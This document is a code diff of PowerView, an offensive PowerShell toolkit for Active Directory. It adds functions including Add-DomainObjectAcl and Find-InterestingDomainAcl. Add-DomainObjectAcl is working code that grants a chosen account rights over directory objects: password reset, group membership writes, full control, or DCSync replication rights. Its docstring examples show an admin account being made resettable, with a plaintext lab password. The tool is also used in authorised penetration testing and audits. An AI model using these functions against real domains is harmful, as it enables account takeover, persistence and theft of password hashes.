+ New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0 | ForEach-Object { if ($PSBoundParameters['Sacl']) {$_.SystemAcl} else {$_.DiscretionaryAcl} } | ForEach-Object {
+ if ($PSBoundParameters['RightsFilter']) {
+ $GuidFilter = Switch ($RightsFilter) {
+ 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }
+ 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
+ Default { '00000000-0000-0000-0000-000000000000' }
+ }
+ if ($_.ObjectType -eq $GuidFilter) {
+ $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+ $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
+ $Continue = $True
+ }
+ }
+ else {
+ $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+ $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
+ $Continue = $True
+ }
- # force the password to be changed on next login
- Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue 0
+ if ($Continue) {
+ $_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask))
+ if ($GUIDs) {
+ # if we're resolving GUIDs, map them them to the resolved hash table
+ $AclProperties = @{}
+ $_.psobject.properties | ForEach-Object {
+ if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') {
+ try {
+ $AclProperties[$_.Name] = $GUIDs[$_.Value.toString()]
+ }
+ catch {
+ $AclProperties[$_.Name] = $_.Value
+ }
+ }
+ else {
+ $AclProperties[$_.Name] = $_.Value
+ }
+ }
+ $OutObject = New-Object -TypeName PSObject -Property $AclProperties
+ $OutObject.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
+ $OutObject
+ }
+ else {
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
+ $_
+ }
+ }
+ }
+ }
+ catch {
+ Write-Verbose "[Get-DomainObjectAcl] Error: $_"
+ }
+ }
}
}
}
-function Get-ComputerProperty {
+function Add-DomainObjectAcl {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Adds an ACL for a specific active directory object.
+
+AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+.DESCRIPTION
+
+This function modifies the ACL/ACE entries for a given Active Directory
+target object specified by -TargetIdentity. Available -Rights are
+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
+rights GUID can be set with -RightsGUID. These rights are granted on the target
+object for the specified -PrincipalIdentity.
+
+.PARAMETER TargetIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain object to modify ACLs for. Required. Wildcards accepted.
+
+.PARAMETER TargetDomain
+
+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
+
+.PARAMETER TargetLDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory object targets.
+
+.PARAMETER TargetSearchBase
+
+The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER PrincipalIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain principal to add for the ACL. Required. Wildcards accepted.
+
+.PARAMETER PrincipalDomain
- Returns a list of all computer object properties. If a property
- name is specified, it returns all [computer:property] values.
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
- Taken directly from @obscuresec's post:
- http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+.PARAMETER Server
- .PARAMETER Properties
+Specifies an Active Directory server (domain controller) to bind to.
- Return property names for computers.
+.PARAMETER SearchScope
- .PARAMETER Domain
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The domain to query for computer properties, defaults to the current domain.
+.PARAMETER ResultPageSize
- .PARAMETER DomainController
+Specifies the PageSize to set for the LDAP searcher object.
- Domain controller to reflect LDAP queries through.
+.PARAMETER ServerTimeLimit
- .PARAMETER PageSize
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Tombstone
- .PARAMETER Credential
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Get-ComputerProperty -Domain testing
-
- Returns all user properties for computers in the 'testing' domain.
+.PARAMETER Rights
- .EXAMPLE
+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
+Defaults to 'All'.
- PS C:\> Get-ComputerProperty -Properties ssn,lastlogon,location
-
- Returns all an array of computer/ssn/lastlogin/location combinations
- for computers in the current domain.
+.PARAMETER RightsGUID
- .LINK
+Manual GUID representing the right to add to the target.
- http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+.EXAMPLE
+
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+...
+
+Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+.EXAMPLE
+
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+[no results returned]
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+.LINK
+
+https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
- param(
+ Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String[]]
- $Properties,
+ $TargetIdentity,
+ [ValidateNotNullOrEmpty()]
[String]
- $Domain,
+ $TargetDomain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $TargetLDAPFilter,
- [ValidateRange(1,10000)]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $TargetSearchBase,
+
+ [Parameter(Mandatory = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $PrincipalIdentity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $PrincipalDomain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')]
+ [String]
+ $Rights = 'All',
+
+ [Guid]
+ $RightsGUID
)
- if($Properties) {
- # extract out the set of all properties for each object
- $Properties = ,"name" + $Properties | Sort-Object -Unique
- Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -Property $Properties
+ BEGIN {
+ $TargetSearcherArguments = @{
+ 'Properties' = 'distinguishedname'
+ 'Raw' = $True
+ }
+ if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain }
+ if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter }
+ if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase }
+ if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential }
+
+ $PrincipalSearcherArguments = @{
+ 'Identity' = $PrincipalIdentity
+ 'Properties' = 'distinguishedname,objectsid'
+ }
+ if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }
+ if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }
+ $Principals = Get-DomainObject @PrincipalSearcherArguments
+ if (-not $Principals) {
+ throw "Unable to resolve principal: $PrincipalIdentity"
+ }
}
- else {
- # extract out just the property names
- Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -first 1 | Get-Member -MemberType *Property | Select-Object -Property "Name"
+
+ PROCESS {
+ $TargetSearcherArguments['Identity'] = $TargetIdentity
+ $Targets = Get-DomainObject @TargetSearcherArguments
+
+ ForEach ($TargetObject in $Targets) {
+
+ $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None'
+ $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow'
+ $ACEs = @()
+
+ if ($RightsGUID) {
+ $GUIDs = @($RightsGUID)
+ }
+ else {
+ $GUIDs = Switch ($Rights) {
+ # ResetPassword doesn't need to know the user's current password
+ 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }
+ # allows for the modification of group membership
+ 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
+ # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
+ # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
+ # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c
+ # when applied to a domain's ACL, allows for the use of DCSync
+ 'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'}
+ }
+ }
+
+ ForEach ($PrincipalObject in $Principals) {
+ Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname)"
+
+ try {
+ $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid)
+
+ if ($GUIDs) {
+ ForEach ($GUID in $GUIDs) {
+ $NewGUID = New-Object Guid $GUID
+ $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight'
+ $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType
+ }
+ }
+ else {
+ # deault to GenericAll rights
+ $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll'
+ $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType
+ }
+
+ # add all the new ACEs to the specified object directory entry
+ ForEach ($ACE in $ACEs) {
+ Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)"
+ $TargetEntry = $TargetObject.GetDirectoryEntry()
+ $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl'
+ $TargetEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)
+ $TargetEntry.PsBase.CommitChanges()
+ }
+ }
+ catch {
+ Write-Warning "[Add-DomainObjectAcl] Error granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname) : $_"
+ }
+ }
+ }
}
}
-function Find-ComputerField {
+function Find-InterestingDomainAcl {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Finds object ACLs in the current (or specified) domain with modification
+rights set to non-built in objects.
+
+Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName
+
+.DESCRIPTION
- Searches computer object fields for a given word (default *pass*). Default
- field being searched is 'description'.
+This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
+and for each returned ACE entry it checks if principal security identifier
+is *-1000 (meaning the account is not built in), and also checks if the rights for
+the ACE mean the object can be modified by the principal. If these conditions are met,
+then the security identifier SID is translated, the domain object is retrieved, and
+additional IdentityReference* information is appended to the output object.
- Taken directly from @obscuresec's post:
- http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+.PARAMETER Domain
- .PARAMETER SearchTerm
+Specifies the domain to use for the query, defaults to the current domain.
- Term to search for, default of "pass".
+.PARAMETER ResolveGUIDs
- .PARAMETER SearchField
+Switch. Resolve GUIDs to their display names.
- User field to search in, default of "description".
+.PARAMETER LDAPFilter
- .PARAMETER ADSpath
+Specifies an LDAP query string that is used to filter Active Directory objects.
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER SearchBase
- .PARAMETER Domain
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- Domain to search computer fields for, defaults to the current domain.
+.PARAMETER Server
- .PARAMETER DomainController
+Specifies an Active Directory server (domain controller) to bind to.
- Domain controller to reflect LDAP queries through.
+.PARAMETER SearchScope
- .PARAMETER PageSize
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The PageSize to set for the LDAP searcher object.
+.PARAMETER ResultPageSize
- .PARAMETER Credential
+Specifies the PageSize to set for the LDAP searcher object.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER ServerTimeLimit
- .EXAMPLE
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- PS C:\> Find-ComputerField -SearchTerm backup -SearchField info
+.PARAMETER Tombstone
- Find computer accounts with "backup" in the "info" field.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Find-InterestingDomainAcl
+
+Finds interesting object ACLS in the current domain.
+
+.EXAMPLE
+
+Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
+
+Finds interesting object ACLS in the ev.testlab.local domain and
+resolves rights GUIDs to display names.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs
+
+.OUTPUTS
+
+PowerView.ACL
+
+Custom PSObject with ACL entries.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ACL')]
[CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Term')]
+ Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DomainName', 'Name')]
[String]
- $SearchTerm = 'pass',
+ $Domain,
+
+ [Switch]
+ $ResolveGUIDs,
- [Alias('Field')]
[String]
- $SearchField = 'description',
+ [ValidateSet('All', 'ResetPassword', 'WriteMembers')]
+ $RightsFilter,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $ADSpath,
+ $LDAPFilter,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $Domain,
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $DomainController,
+ $SearchScope = 'Subtree',
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- process {
- Get-NetComputer -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField
+ BEGIN {
+ $ACLArguments = @{}
+ if ($PSBoundParameters['ResolveGUIDs']) { $ACLArguments['ResolveGUIDs'] = $ResolveGUIDs }
+ if ($PSBoundParameters['RightsFilter']) { $ACLArguments['RightsFilter'] = $RightsFilter }
+ if ($PSBoundParameters['LDAPFilter']) { $ACLArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $ACLArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }
+
+ $ObjectSearcherArguments = @{
+ 'Properties' = 'samaccountname,objectclass'
+ 'Raw' = $True
+ }
+ if ($PSBoundParameters['Server']) { $ObjectSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ObjectSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ObjectSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ObjectSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ObjectSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ObjectSearcherArguments['Credential'] = $Credential }
+
+ $ADNameArguments = @{}
+ if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
+
+ # ongoing list of built-up SIDs
+ $ResolvedSIDs = @{}
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $ACLArguments['Domain'] = $Domain
+ $ADNameArguments['Domain'] = $Domain
+ }
+
+ Get-DomainObjectAcl @ACLArguments | ForEach-Object {
+
+ if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) {
+ # only process SIDs > 1000
+ if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\d{3,}$') {
+ if ($ResolvedSIDs[$_.SecurityIdentifier.Value]) {
+ $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass = $ResolvedSIDs[$_.SecurityIdentifier.Value]
+
+ $InterestingACL = New-Object PSObject
+ $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN
+ $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier
+ $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights
+ if ($_.ObjectAceType) {
+ $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType
+ }
+ else {
+ $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'
+ }
+ $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags
+ $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType
+ $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags
+ $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass
+ $InterestingACL
+ }
+ else {
+ $IdentityReferenceDN = Convert-ADName -Identity $_.SecurityIdentifier.Value -OutputType DN @ADNameArguments
+ # "IdentityReferenceDN: $IdentityReferenceDN"
+
+ if ($IdentityReferenceDN) {
+ $IdentityReferenceDomain = $IdentityReferenceDN.SubString($IdentityReferenceDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ # "IdentityReferenceDomain: $IdentityReferenceDomain"
+ $ObjectSearcherArguments['Domain'] = $IdentityReferenceDomain
+ $ObjectSearcherArguments['Identity'] = $IdentityReferenceDN
+ # "IdentityReferenceDN: $IdentityReferenceDN"
+ $Object = Get-DomainObject @ObjectSearcherArguments
+
+ if ($Object) {
+ $IdentityReferenceName = $Object.Properties.samaccountname[0]
+ if ($Object.Properties.objectclass -match 'computer') {
+ $IdentityReferenceClass = 'computer'
+ }
+ elseif ($Object.Properties.objectclass -match 'group') {
+ $IdentityReferenceClass = 'group'
+ }
+ elseif ($Object.Properties.objectclass -match 'user') {
+ $IdentityReferenceClass = 'user'
+ }
+ else {
+ $IdentityReferenceClass = $Null
+ }
+
+ # save so we don't look up more than once
+ $ResolvedSIDs[$_.SecurityIdentifier.Value] = $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass
+
+ $InterestingACL = New-Object PSObject
+ $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN
+ $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier
+ $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights
+ if ($_.ObjectAceType) {
+ $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType
+ }
+ else {
+ $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'
+ }
+ $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags
+ $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType
+ $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags
+ $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN
+ $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass
+ $InterestingACL
+ }
+ }
+ else {
+ Write-Warning "[Find-InterestingDomainAcl] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with Convert-ADName"
+ }
+ }
+ }
+ }
+ }
}
}
-function Get-NetOU {
+function Get-DomainOU {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Search for all organization units (OUs) or specific OU objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties whencreated,usnchanged,...". By default, all OU objects for
+the current domain are returned.
+
+.PARAMETER Identity
+
+An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). Wildcards accepted.
+
+.PARAMETER GPLink
+
+Only return OUs with the specified GUID in their gplink property.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
- Gets a list of all current OUs in a domain.
+.PARAMETER LDAPFilter
- .PARAMETER OUName
+Specifies an LDAP query string that is used to filter Active Directory objects.
- The OU name to query for, wildcards accepted.
+.PARAMETER Properties
- .PARAMETER GUID
